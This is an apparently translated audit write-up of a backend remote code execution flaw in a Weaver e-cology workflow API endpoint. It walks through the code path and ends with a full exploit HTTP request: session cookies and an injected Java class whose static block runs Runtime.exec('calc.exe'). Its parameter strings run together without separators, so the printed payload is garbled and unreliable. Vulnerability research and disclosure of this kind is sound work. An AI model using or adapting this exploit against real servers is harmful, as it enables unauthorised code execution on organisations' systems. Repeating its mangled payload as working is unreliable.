Title: A micro-1day backend RCE audit vulnerability

A certain application has a background RCE. According to relevant information, we found a call to newInstance instantiation in the background audit process.

Trace the source and find InterfaceRegisterCustomOperationCmd #excute

The access path is /api/integration/workflowflow/getInterfaceRegisterCustomOperation

getInterfaceRegisterCustomOperation calls execute, first judging the user, so here is a background vulnerability

Because we need this taint function JavaCodeToObject, we must meet the conditions of if and control var18 and var20

Here var14 needs to be added

The value of var14 is obtained from the request parameter method, because the POST method is specified before, so here method=add

After entering if judgment, the value of var15 will be returned if it is empty, so the value of actionid is not empty. Combined with the above condition, method=addactionid=1

If the beginning of var18 is not weaver.interfaces.workflow.action.javacode.Action will enter the following judgment, causing an exception to be thrown, which cannot achieve the desired result. So here classname=weaver.interfaces.workflow.action.javacode.Action, combined with the above parameter method=addactionid=1classname=weaver.interfaces.workflow.action.javacode.Action

The following var20 value is taken from the javacode parameter, combined with the above payload method=addactionid=1classname=weaver.interfaces.workflow.action.javacode.Actionjavacode=

If var18 contains weaver.interfaces.workflow.action.javacode into the javacodetoobject call we want, so classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Action is used for connection. Otherwise, a loading exception will be reported.

According to the above conditions, the var18 and var20 conditions have been met. The parameters of the constructed var20 are javacode=package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode; import java.io.IOException; public class test { static { try { Runtime.getRuntime().exec('calc.exe'); } catch (IOException e) { e.printStackTrace(); } } } Here the code executed by the command is placed in the static code block because the code in static will be automatically executed during instantiation, and the command execution will be achieved.

It seems that the actual package is not successfully used. Looking back at the code, I found that a parameter was lost dtinfo_CustomParameterData

POST /api/integration/workflowflow/getInterfaceRegisterCustomOperation HTTP/1.1

Host:

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.33

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6

Cookie: ecology_JSessionid=aaa8G6PRBnnBD82yi6Fky; JSESSIONID=aaa8G6PRBnnBD82yi6Fky; __randcode__=d2fa15e2-395e-4b3b-a004-82fc07c18695; loginidweaver=1; languageidweaver=7; loginuuids=1

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 548

method=addactionid=1classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Testdtinfo_CustomParameterData=11javaCode=package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode;

import java.io.IOException;

public class Test {

static {

try {

Runtime.getRuntime().exec('calc.exe');

} catch (IOException e) {

e.printStackTrace();

}

}

}

Reprinted from: https://xz.aliyun.com/t/11947